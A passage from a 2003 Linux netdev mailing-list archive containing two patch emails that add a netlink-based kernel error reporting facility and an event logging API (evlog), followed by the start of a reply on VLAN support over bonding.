? Seems to resolve a link-local address for the router just fine. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From jkenisto@us.ibm.com Tue Jul 15 10:46:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:46:15 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHk5Fl031848 for ; Tue, 15 Jul 2003 10:46:08 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FHj4wO054952; Tue, 15 Jul 2003 13:45:04 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FHj0cE139452; Tue, 15 Jul 2003 13:45:01 -0400 Message-ID: <3F143D0A.A052F0B6@us.ibm.com> Date: Tue, 15 Jul 2003 10:42:34 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: multipart/mixed; boundary="------------0BE7F200693D6C2244226BA0" X-archive-position: 4055 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------0BE7F200693D6C2244226BA0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Jim Keniston wrote: > Subject: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting > > Andrew Morton's 2.6 must-fix list includes the following item: > > o We need a kernel side API for reporting error events to userspace (could > > be async to 2.6 itself) > > > > (Prototype core based on netlink exists) > > The enclosed patches provide a mechanism for reporting error events > to user-mode applications via netlink. This mechanism supplements > the text-oriented printk mechanism, providing a way to log binary > data or a mixture of text+binary. > ... > Here are updated patches, reflecting the following changes: Patch #1 (kerror.c et al): - Given James Morris's patch to af_netlink.c (Rev 1.30 in BitKeeper), I was able to remove kerror_netlink_rcv(). (My patches work fine without this, except that any packets sent to the NETLINK_KERROR socket by an ill-behaved, root-owned application would accumulate in the kernel's socket buffer.) Patch #2 (evlog.c et al -- see accompanying post): - Paraphrase dropped packets via printk() when nobody's listening to netlink socket. - Added support for 'z' qualifier, to resync with vsnprintf(). - In evlog.h, reordered members of struct kern_log_entry to address alignment worries. These patches work for both 2.5.74 and 2.5.75. Jim Keniston IBM Linux Technology Center http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/evlog-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download --------------0BE7F200693D6C2244226BA0 Content-Type: text/plain; charset=us-ascii; name="kerror-2.5.75.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="kerror-2.5.75.patch" diff -Naur linux.org/include/linux/kerror.h linux.kerror.patched/include/linux/kerror.h --- linux.org/include/linux/kerror.h Wed Dec 31 16:00:00 1969 +++ linux.kerror.patched/include/linux/kerror.h Mon Jul 14 09:53:00 2003 @@ -0,0 +1,27 @@ +#ifndef _KERROR_H +#define _KERROR_H + +#ifdef __KERNEL__ +#include +#include +#include + +#ifdef CONFIG_NET +extern int kernel_error_event(void *data, size_t len, __u32 groups); +extern int kernel_error_event_iov(const struct iovec *iov, + unsigned int nseg, __u32 groups); +#else +static inline int kernel_error_event(void *data, size_t len, __u32 groups) + { return -ENOSYS; } +static inline int kernel_error_event_iov(const struct iovec *iov, + unsigned int nseg, __u32 groups) + { return -ENOSYS; } +#endif /* CONFIG_NET */ +#endif /* __KERNEL__ */ + +#define KERROR_GROUP_RAW 0x00000001 +#define KERROR_GROUP_EVLOG 0x00000002 + +#define KERROR_GROUP_ALL (~(u32)0) + +#endif /* _KERROR_H */ diff -Naur linux.org/include/linux/netlink.h linux.kerror.patched/include/linux/netlink.h --- linux.org/include/linux/netlink.h Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/include/linux/netlink.h Mon Jul 14 09:53:00 2003 @@ -10,6 +10,7 @@ #define NETLINK_TCPDIAG 4 /* TCP socket monitoring */ #define NETLINK_NFLOG 5 /* netfilter/iptables ULOG */ #define NETLINK_XFRM 6 /* ipsec */ +#define NETLINK_KERROR 7 /* kernel error event facility */ #define NETLINK_ARPD 8 #define NETLINK_ROUTE6 11 /* af_inet6 route comm channel */ #define NETLINK_IP6_FW 13 diff -Naur linux.org/net/netlink/Makefile linux.kerror.patched/net/netlink/Makefile --- linux.org/net/netlink/Makefile Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/net/netlink/Makefile Mon Jul 14 09:53:00 2003 @@ -2,5 +2,5 @@ # Makefile for the netlink driver. # -obj-y := af_netlink.o +obj-y := af_netlink.o kerror.o obj-$(CONFIG_NETLINK_DEV) += netlink_dev.o diff -Naur linux.org/net/netlink/kerror.c linux.kerror.patched/net/netlink/kerror.c --- linux.org/net/netlink/kerror.c Wed Dec 31 16:00:00 1969 +++ linux.kerror.patched/net/netlink/kerror.c Mon Jul 14 09:53:00 2003 @@ -0,0 +1,97 @@ +/* kerror.c: Kernel error event logging facility. + * + * Copyright (C) 2003 David S. Miller (davem@redhat.com) + * June 2003 - Jim Keniston and Dan Stekloff (kenistoj and dsteklof@us.ibm.com) + * Fixed a couple of bugs and added iovec interface. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static struct sock *kerror_nl; + +/** + * kernel_error_event_iov() - Broadcast packet to NETLINK_KERROR sockets. + * @iov: the packet's data + * @nseg: number of segments in iov[] + * @groups: as with kernel_error_event() + */ +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg, + u32 groups) +{ + struct sk_buff *skb; + struct nlmsghdr *nlh; + unsigned char *b, *p; + size_t len; + unsigned int seg; + + if (!groups) + return -EINVAL; + + len = iov_length(iov, nseg); + skb = alloc_skb(NLMSG_SPACE(len), GFP_ATOMIC); + if (skb == NULL) + return -ENOMEM; + + b = skb->tail; + + nlh = NLMSG_PUT(skb, current->pid, 0, 0, len); + nlh->nlmsg_flags = 0; + + p = NLMSG_DATA(nlh); + for (seg = 0; seg < nseg; seg++) { + memcpy(p, (const void*)iov[seg].iov_base, iov[seg].iov_len); + p += iov[seg].iov_len; + } + nlh->nlmsg_len = skb->tail - b; + + NETLINK_CB(skb).dst_groups = groups; + + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); + +nlmsg_failure: + kfree_skb(skb); + return -EINVAL; +} + +/** + * kernel_error_event() - Broadcast packet to NETLINK_KERROR sockets. + * @data, @len: the packet's data + * @groups: the group(s) to which the packet pertains -- e.g., + * KERROR_GROUP_EVLOG. On a recvmsg(), this shows up in + * ((struct sockaddr_nl*)(msg->msg_name))->nl_groups. + */ +int kernel_error_event(void *data, size_t len, u32 groups) +{ + struct iovec iov; + iov.iov_base = data; + iov.iov_len = len; + return kernel_error_event_iov(&iov, 1, groups); +} + +static int __init kerror_init(void) +{ + printk(KERN_INFO "Initializing KERROR netlink socket\n"); + + /* Note that we ignore all incoming messages on this socket. */ + kerror_nl = netlink_kernel_create(NETLINK_KERROR, NULL); + if (kerror_nl == NULL) + panic("kerror_init: cannot initialize kerror_nl\n"); + + return 0; +} + +static void __exit kerror_exit(void) +{ + sock_release(kerror_nl->sk_socket); +} + +module_init(kerror_init); +module_exit(kerror_exit); diff -Naur linux.org/net/netsyms.c linux.kerror.patched/net/netsyms.c --- linux.org/net/netsyms.c Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/net/netsyms.c Mon Jul 14 09:53:00 2003 @@ -83,6 +83,7 @@ #endif #include +#include #ifdef CONFIG_IPX_MODULE extern struct datalink_proto *make_EII_client(void); @@ -505,6 +506,8 @@ EXPORT_SYMBOL(netlink_set_nonroot); EXPORT_SYMBOL(netlink_register_notifier); EXPORT_SYMBOL(netlink_unregister_notifier); +EXPORT_SYMBOL(kernel_error_event); +EXPORT_SYMBOL(kernel_error_event_iov); #if defined(CONFIG_NETLINK_DEV) || defined(CONFIG_NETLINK_DEV_MODULE) EXPORT_SYMBOL(netlink_attach); EXPORT_SYMBOL(netlink_detach); --------------0BE7F200693D6C2244226BA0-- From jkenisto@us.ibm.com Tue Jul 15 10:49:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:49:30 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHnLFl032209 for ; Tue, 15 Jul 2003 10:49:22 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FHmKKb223844; Tue, 15 Jul 2003 13:48:20 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FHmDrU076526; Tue, 15 Jul 2003 13:48:14 -0400 Message-ID: <3F143DCA.8369CDE6@us.ibm.com> Date: Tue, 15 Jul 2003 10:45:46 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris , "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [2/2] kernel error reporting (revised) References: <3F143D0A.A052F0B6@us.ibm.com> Content-Type: multipart/mixed; boundary="------------C7D4C0502BFD8844E4AD4ADE" X-archive-position: 4056 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------C7D4C0502BFD8844E4AD4ADE Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit This patch is described in the previous post. Jim Keniston IBM Linux Technology Center --------------C7D4C0502BFD8844E4AD4ADE Content-Type: text/plain; charset=us-ascii; name="evlog-2.5.75.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="evlog-2.5.75.patch" diff -Naur linux.org/include/linux/evlog.h linux.evlog.patched/include/linux/evlog.h --- linux.org/include/linux/evlog.h Wed Dec 31 16:00:00 1969 +++ linux.evlog.patched/include/linux/evlog.h Mon Jul 14 09:52:59 2003 @@ -0,0 +1,109 @@ +/* + * Linux Event Logging + * Copyright (c) International Business Machines Corp., 2001 + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Please send e-mail to kenistoj@users.sourceforge.net if you have + * questions or comments. + * + * Project Website: http://evlog.sourceforge.net/ + */ + +#ifndef _LINUX_EVLOG_H +#define _LINUX_EVLOG_H + +#include +#include +#include + +/* Values for log_flags member */ +#define EVL_TRUNCATE 0x1 +#define EVL_KERNEL_EVENT 0x2 +#define EVL_INTERRUPT 0x10 /* Logged from interrupt context */ +#define EVL_PRINTK 0x20 /* Strip leading when formatting */ +#define EVL_EVTYCRC 0x40 /* Daemon will set event type = CRC */ + /* of format string. */ + +/* Formats for optional portion of record. */ +#define EVL_NODATA 0 +#define EVL_BINARY 1 +#define EVL_STRING 2 +#define EVL_PRINTF 3 + +/* Maximum length of variable portion of record */ +#define EVL_ENTRY_MAXLEN (8 * 1024) + +/* Facility (e.g., driver) names are truncated to 15+null. */ +#define FACILITY_MAXLEN 16 + +/* + * struct kern_log_entry - kernel record header + * Each record sent to group KERROR_GROUP_EVLOG begins with this header. + */ +struct kern_log_entry { + __u16 log_kmagic; /* always LOGREC_KMAGIC */ + __u16 log_kversion; /* which version of this struct? */ + __u16 log_size; /* # bytes in variable part of record */ + __s8 log_format; /* BINARY, STRING, PRINTF, NODATA */ + __s8 log_severity; /* DEBUG, INFO, NOTICE, WARN, etc. */ + __s32 log_event_type; /* facility-specific event ID */ + __u32 log_flags; /* EVL_TRUNCATE, etc. */ + __s32 log_processor; /* CPU ID */ + uid_t log_uid; /* event context... */ + gid_t log_gid; + pid_t log_pid; + pid_t log_pgrp; + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ +}; + +#define LOGREC_KMAGIC 0x7af8 +#define LOGREC_KVERSION 3 + +#ifdef __KERNEL__ +/* + * severities, AKA priorities + */ +#define LOG_EMERG 0 /* system is unusable */ +#define LOG_ALERT 1 /* action must be taken immediately */ +#define LOG_CRIT 2 /* critical conditions */ +#define LOG_ERR 3 /* error conditions */ +#define LOG_WARNING 4 /* warning conditions */ +#define LOG_NOTICE 5 /* normal but significant condition */ +#define LOG_INFO 6 /* informational */ +#define LOG_DEBUG 7 /* debug-level messages */ + +#ifdef CONFIG_NET +extern int evl_write(const char *facility, int event_type, + int severity, const void *buf, size_t len, int format); +extern int evl_printf(const char *facility, int event_type, int sev, + const char *fmt, ...); +extern int evl_vprintf(const char *facility, int event_type, int sev, + const char *fmt, va_list args); +#else /* ! CONFIG_NET */ +static inline int evl_write(const char *facility, int event_type, + int severity, const void *buf, size_t len, int format) + { return -ENOSYS; } +static inline int evl_printf(const char *facility, int event_type, int sev, + const char *fmt, ...); + { return -ENOSYS; } +static inline int evl_vprintf(const char *facility, int event_type, int sev, + const char *fmt, va_list args) + { return -ENOSYS; } +#endif /* CONFIG_NET */ + +#endif /* __KERNEL__ */ + +#endif /* _LINUX_EVLOG_H */ diff -Naur linux.org/kernel/Makefile linux.evlog.patched/kernel/Makefile --- linux.org/kernel/Makefile Mon Jul 14 09:52:59 2003 +++ linux.evlog.patched/kernel/Makefile Mon Jul 14 09:52:59 2003 @@ -19,6 +19,7 @@ obj-$(CONFIG_BSD_PROCESS_ACCT) += acct.o obj-$(CONFIG_SOFTWARE_SUSPEND) += suspend.o obj-$(CONFIG_COMPAT) += compat.o +obj-$(CONFIG_NET) += evlog.o ifneq ($(CONFIG_IA64),y) # According to Alan Modra , the -fno-omit-frame-pointer is diff -Naur linux.org/kernel/evlog.c linux.evlog.patched/kernel/evlog.c --- linux.org/kernel/evlog.c Wed Dec 31 16:00:00 1969 +++ linux.evlog.patched/kernel/evlog.c Mon Jul 14 09:52:59 2003 @@ -0,0 +1,542 @@ +/* + * Linux Event Logging + * Copyright (c) International Business Machines Corp., 2003 + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Please send e-mail to kenistoj@users.sourceforge.net if you have + * questions or comments. + * + * Project Website: http://evlog.sourceforge.net/ + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static void report_dropped_event(const struct kern_log_entry *hdr, + const void *vardata); +static void report_dropped_printf_event(const struct kern_log_entry *hdr, + const char *fmt, va_list args); + +/** + * mk_rec_header() - Populate evlog record header. + * @fac: facility name (e.g., "kern", driver name) + * @event_type: event type (event ID assigned by programmer; may also be + * computed by recipient -- e.g., CRC of format string) + * @severity: severity level (e.g., LOG_INFO) + * @size: length, in bytes, of variable data + * @flags: event flags (e.g., EVL_TRUNCATE, EVL_EVTYCRC) + * @format: format of variable data (e.g., EVL_STRING) + */ +static void +mk_rec_header(struct kern_log_entry *rec_hdr, + const char *facility, + int event_type, + int severity, + size_t size, + uint flags, + int format) +{ + rec_hdr->log_kmagic = LOGREC_KMAGIC; + rec_hdr->log_kversion = LOGREC_KVERSION; + rec_hdr->log_size = (__u16) size; + rec_hdr->log_format = (__s8) format; + rec_hdr->log_event_type = (__s32) event_type; + rec_hdr->log_severity = (__s8) severity; + rec_hdr->log_uid = current->uid; + rec_hdr->log_gid = current->gid; + rec_hdr->log_pid = current->pid; + rec_hdr->log_pgrp = current->pgrp; + rec_hdr->log_flags = (__u32) flags; + rec_hdr->log_processor = (__s32) smp_processor_id(); + + strncpy(rec_hdr->log_facility, facility, FACILITY_MAXLEN); + rec_hdr->log_facility[FACILITY_MAXLEN-1] = '\0'; +} + +/** + * evl_sendh() - Log event, given a pre-constructed header. + * In case of sloppiness, clean it up rather than failing, since the caller + * is unlikely to handle failure. + * Returns 0 on success, or a negative error code otherwise. + */ +static int +evl_sendh(struct kern_log_entry *hdr, const void *vardata) +{ + struct iovec iov[2] = { + { hdr, sizeof(struct kern_log_entry) }, + { (void*) vardata, hdr->log_size } + }; + int nsegs = 2; + + if (hdr->log_severity < 0 || hdr->log_severity > LOG_DEBUG) { + hdr->log_severity = LOG_WARNING; + } + if (vardata == NULL || hdr->log_size == 0) { + vardata = NULL; + hdr->log_size = 0; + hdr->log_format = EVL_NODATA; + nsegs = 1; + } + hdr->log_flags |= EVL_KERNEL_EVENT; + if (in_interrupt()) { + hdr->log_flags |= EVL_INTERRUPT; + } + if (hdr->log_size > EVL_ENTRY_MAXLEN) { + iov[1].iov_len = hdr->log_size = EVL_ENTRY_MAXLEN; + hdr->log_flags |= EVL_TRUNCATE; + } + + return kernel_error_event_iov(iov, nsegs, KERROR_GROUP_EVLOG); +} + +/** + * evl_write() - write header + optional buffer to event handler + * + * @buf: optional variable-length data + * other args as per mk_rec_header() + */ +int +evl_write(const char *fac, int event_type, int severity, const void *buf, + size_t size, int format) +{ + int ret; + struct kern_log_entry hdr; + + mk_rec_header(&hdr, fac, event_type, severity, size, 0, format); + ret = evl_sendh(&hdr, buf); + if (ret == -ESRCH) { + report_dropped_event(&hdr, buf); + } + return ret; +} + +/* + * A buffer to pack with data, one value at a time. By convention, b_tail + * reflects the total amount you've attempted to add, and so may be past b_end. + */ +struct evl_recbuf { + char *b_buf; /* start of buffer */ + char *b_tail; /* add next data here */ + char *b_end; /* b_buf + buffer size */ +}; + +void +evl_init_recbuf(struct evl_recbuf *b, char *buf, size_t size) +{ + b->b_buf = buf; + b->b_tail = buf; + b->b_end = buf + size; +} + +/** + * evl_put() - Append data to buffer; handle overflow. + * @b - describes buffer; updated to reflect data appended + * @data - data to append + * @datasz - data length in bytes + */ +void +evl_put(struct evl_recbuf *b, const void *data, size_t datasz) +{ + ptrdiff_t room = b->b_end - b->b_tail; + if (room > 0) { + (void) memcpy(b->b_tail, data, min(datasz, (size_t)room)); + } + b->b_tail += datasz; +} + +/** + * evl_puts() - Append string to buffer; handle overflow. + * Append a string to the buffer. If null == 1, we include the terminating + * null. If the string extends over the end of the buffer, terminate the + * buffer with a null. + * + * @b - describes buffer; updated to reflect data appended + * @s - null-terminated string + * @null - 1 if we append the terminating null, 0 otherwise + */ +void +evl_puts(struct evl_recbuf *b, const char *s, int null) +{ + char *old_tail = b->b_tail; + evl_put(b, s, strlen(s) + null); + if (b->b_tail > b->b_end && old_tail < b->b_end) { + *(b->b_end - 1) = '\0'; + } +} + +static inline void +skip_atoi(const char **s) +{ + while (isdigit(**s)) { + (*s)++; + } +} + +/** + * parse_printf_fmt() - Parse printf/printk conversion spec. + * fmt points to the '%' in a printk conversion specification. Advance + * fmt past any flags, width and/or precision specifiers, and qualifiers + * such as 'l' and 'L'. Return a pointer to the conversion character. + * Stores the qualifier character (or -1, if there is none) at *pqualifier. + * *wp is set to flags indicating whether the width and/or precision are '*'. + * For example, given + * %*.2lx + * *pqualifier is set to 'l', *wp is set to 0x1, and a pointer to the 'x' + * is returned. + * + * Note: This function is derived from vsnprintf() (see lib/vsprintf.c), + * and should be kept in sync with that function. + * + * @fmt - points to '%' in conversion spec + * @pqualifier - *pqualifier is set to conversion spec's qualifier, or -1. + * @wp - Bits in *wp are set if the width or/and precision are '*'. + */ +const char * +parse_printf_fmt(const char *fmt, int *pqualifier, int *wp) +{ + int qualifier = -1; + *wp = 0; + + /* process flags */ + repeat: + ++fmt; /* this also skips first '%' */ + switch (*fmt) { + case '-': + case '+': + case ' ': + case '#': + case '0': + goto repeat; + } + + /* get field width */ + if (isdigit(*fmt)) + skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + *wp |= 0x1; + } + + /* get the precision */ + if (*fmt == '.') { + ++fmt; + if (isdigit(*fmt)) + skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + *wp |= 0x2; + } + } + + /* get the conversion qualifier */ + if (*fmt == 'h' || *fmt == 'l' || *fmt == 'L' || + *fmt == 'Z' || *fmt == 'z') { + qualifier = *fmt; + ++fmt; + if (qualifier == 'l' && *fmt == 'l') { + qualifier = 'L'; + ++fmt; + } + } + + *pqualifier = qualifier; + return fmt; +} + +/** + * evl_pack_args() - Pack args into buffer, guided by format string. + * b describes a buffer. fmt and args are as passed to vsnprintf(). Using + * fmt as a guide, copy the args into b's buffer. + * + * @b - describes buffer; updated to reflect data added + * @fmt - printf/printk-style format string + * @args - values to be packed into buffer + */ +void +evl_pack_args(struct evl_recbuf *b, const char *fmt, va_list args) +{ +#define COPYARG(type) \ + do { type v=va_arg(args,type); evl_put(b,&v,sizeof(v)); } while(0) + + const char *s; + int qualifier; + + for (; *fmt ; ++fmt) { + int wp = 0x0; + if (*fmt != '%') { + continue; + } + + fmt = parse_printf_fmt(fmt, &qualifier, &wp); + if (wp & 0x1) { + /* width is '*' (next arg) */ + COPYARG(int); + } + if (wp & 0x2) { + /* ditto precision */ + COPYARG(int); + } + + switch (*fmt) { + case 'c': + COPYARG(int); + continue; + + case 's': + s = va_arg(args, char *); + evl_puts(b, s, 1); + continue; + + case 'p': + COPYARG(void*); + continue; + + case 'n': + /* Skip over the %n arg. */ + if (qualifier == 'l') { + (void) va_arg(args, long *); + } else if (qualifier == 'Z' || qualifier == 'z') { + (void) va_arg(args, size_t *); + } else { + (void) va_arg(args, int *); + } + continue; + + case '%': + continue; + + /* integer number formats - handle outside switch */ + case 'o': + case 'X': + case 'x': + case 'd': + case 'i': + case 'u': + break; + + default: + /* Bogus conversion. Pass thru unchanged. */ + if (*fmt == '\0') + --fmt; + continue; + } + if (qualifier == 'L') { + COPYARG(long long); + } else if (qualifier == 'l') { + COPYARG(long); + } else if (qualifier == 'Z' || qualifier == 'z') { + COPYARG(size_t); + } else if (qualifier == 'h') { + COPYARG(int); + } else { + COPYARG(int); + } + } +} + +/* + * Scratch buffer for constructing event records. This is static because + * (1) we want events to be logged even in low-memory situations; and + * (2) the buffer is too big to be an auto variable. + */ +static spinlock_t msgbuf_lock = SPIN_LOCK_UNLOCKED; +static char msgbuf[EVL_ENTRY_MAXLEN]; + +/** + * evl_send_printf() - Format and log a PRINTF-format message. + * Create and log a PRINTF-format event record whose contents are: + * format string + * int containing args size + * args + * @hdr - pre-constructed record header + * @fmt - format string + * @args - arg list + */ +static int +evl_send_printf(struct kern_log_entry *hdr, const char *fmt, va_list args) +{ + int ret; + struct evl_recbuf b; + int argsz = 0; + char *nl, *pargsz, *pargs; + unsigned long iflags; + + spin_lock_irqsave(&msgbuf_lock, iflags); + evl_init_recbuf(&b, msgbuf, EVL_ENTRY_MAXLEN); + evl_puts(&b, fmt, 1); + + /* + * If the format ends in a newline, remove it. We remove the + * terminating newline to increase flexibility when formatting + * the record for viewing. + */ + nl = b.b_tail - 2; + if (b.b_buf <= nl && nl < b.b_end && *nl == '\n') { + *nl = '\0'; + b.b_tail--; + } + + /* Remember where to store argsz; store 0 for now. */ + pargsz = b.b_tail; + evl_put(&b, &argsz, sizeof(argsz)); + pargs = b.b_tail; + + evl_pack_args(&b, fmt, args); + if (pargs <= b.b_end) { + argsz = (int) (b.b_tail - pargs); + memcpy(pargsz, &argsz, sizeof(argsz)); + } + + hdr->log_size = b.b_tail - b.b_buf; + if (hdr->log_size > EVL_ENTRY_MAXLEN) { + hdr->log_size = EVL_ENTRY_MAXLEN; + hdr->log_flags |= EVL_TRUNCATE; + } + + ret = evl_sendh(hdr, b.b_buf); + spin_unlock_irqrestore(&msgbuf_lock, iflags); + + if (ret == -ESRCH) { + report_dropped_printf_event(hdr, fmt, args); + } + return ret; +} + +/** + * evl_vprintf() - Format and log a PRINTF-format record. + * @fmt - format string + * @args - arg list + * other args as per mk_rec_header(). If event_type == 0, set flag to + * request that recipient set event type. + */ +int +evl_vprintf(const char *facility, int event_type, int severity, + const char *fmt, va_list args) +{ + struct kern_log_entry hdr; + unsigned int flags = 0; + if (event_type == 0) { + flags |= EVL_EVTYCRC; + } + mk_rec_header(&hdr, facility, event_type, severity, 0, flags, + EVL_PRINTF); + + return evl_send_printf(&hdr, fmt, args); +} + +/** + * evl_printf() - Format and log a PRINTF-format record. + * @fmt - format string + * other args as per mk_rec_header() + */ +int +evl_printf(const char *facility, int event_type, int severity, + const char *fmt, ...) +{ + va_list args; + int ret; + va_start(args, fmt); + ret = evl_vprintf(facility, event_type, severity, fmt, args); + va_end(args); + return ret; +} + +/*** Functions for handling of events logged when nobody was listening ***/ +static void +report_dropped_hdr(const struct kern_log_entry *hdr) +{ + printk("<%d>evlog packet dropped: size=%u fmt=%d evty=%#x" + " fac=%s sev=%d uid=%u gid=%u pid=%d pgrp=%d" + " flags=%#x cpu=%d\n", + hdr->log_severity, hdr->log_size, hdr->log_format, + hdr->log_event_type, hdr->log_facility, hdr->log_severity, + hdr->log_uid, hdr->log_gid, hdr->log_pid, hdr->log_pgrp, + hdr->log_flags, hdr->log_processor); +} + +static void +report_dropped_printf_event(const struct kern_log_entry *hdr, const char *fmt, + va_list args) +{ + char msg[500]; + if (hdr->log_flags & EVL_PRINTK) { + /* printk's already reporting this event. */ + return; + } + report_dropped_hdr(hdr); + vsnprintf(msg, 500, fmt, args); + printk("<%d>%s\n", hdr->log_severity, msg); +} + +static void +hexdump(const void *data, size_t nbytes, int severity) +{ +#define MAX_HEXDUMP_LEN 512 /* Keep this small: don't flood printk buffer */ + size_t nb = min(nbytes, (size_t)MAX_HEXDUMP_LEN); + const unsigned char *dbase = (const unsigned char*) data; + const unsigned char *dp = dbase, *dend = dbase + nb; + char *lp, line[100]; + int i; + + while (dp < dend) { + lp = line; + lp += sprintf(lp, "%04X ", (unsigned) (dp - dbase)); + for (i = 0; i < 16 && dp < dend; i++, dp++) { + lp += sprintf(lp, "%02X ", *dp); + } + printk("<%d>%s\n", severity, line); + } +} + +static void +report_dropped_event(const struct kern_log_entry *hdr, const void *vardata) +{ + if (hdr->log_flags & EVL_PRINTK) { + /* printk's already reporting this event. */ + return; + } + report_dropped_hdr(hdr); + switch (hdr->log_format) { + case EVL_STRING: + printk("<%d>%s\n", hdr->log_severity, (const char*) vardata); + break; + case EVL_PRINTF: + /* Should be handled by report_dropped_printf_event() */ + /*FALLTHRU*/ + case EVL_BINARY: + hexdump(vardata, hdr->log_size, hdr->log_severity); + break; + case EVL_NODATA: + default: + break; + } +} + +EXPORT_SYMBOL(evl_write); +EXPORT_SYMBOL(evl_printf); +EXPORT_SYMBOL(evl_vprintf); --------------C7D4C0502BFD8844E4AD4ADE-- From DanE@aiinet.com Tue Jul 15 10:51:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:51:13 -0700 (PDT) Received: from aimail.aiinet.priv ([205.245.181.13]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHp4Fl032556 for ; Tue, 15 Jul 2003 10:51:07 -0700 Received: by aimail.aiinet.priv with Internet Mail Service (5.5.2653.19) id ; Tue, 15 Jul 2003 13:49:51 -0400 Message-ID: From: "Eble, Dan" To: "'Shmulik Hen'" , "'Stephen Hemminger'" Cc: bond-devel , linux-net , linux-netdev , "David S. Miller" , Ben Greear , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: RE: [RFC][bonding] Improve VLAN support on top of bonding Date: Tue, 15 Jul 2003 13:49:50 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain X-archive-position: 4057 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: DanE@aiinet.com Precedence: bulk X-list: netdev My US$0.02: Bonding and bridging have some things in common, at least as far as having to deal with diverse hardware. It would be nice to have a [un]tagging interface that is useful to both drivers with as little code duplication as is reasonably possible. > -----Original Message----- > From: Shmulik Hen [mailto:shmulik.hen@intel.com] > Sent: Tuesday, July 15, 2003 9:55 AM > To: bond-devel; linux-net; linux-netdev; David S. Miller; Ben > Greear; Jeff Garzik; Jay Vosburgh > Cc: Amir Noam; Noam Marom; Shmulik Hen; Tsippy Mendelson > Subject: [RFC][bonding] Improve 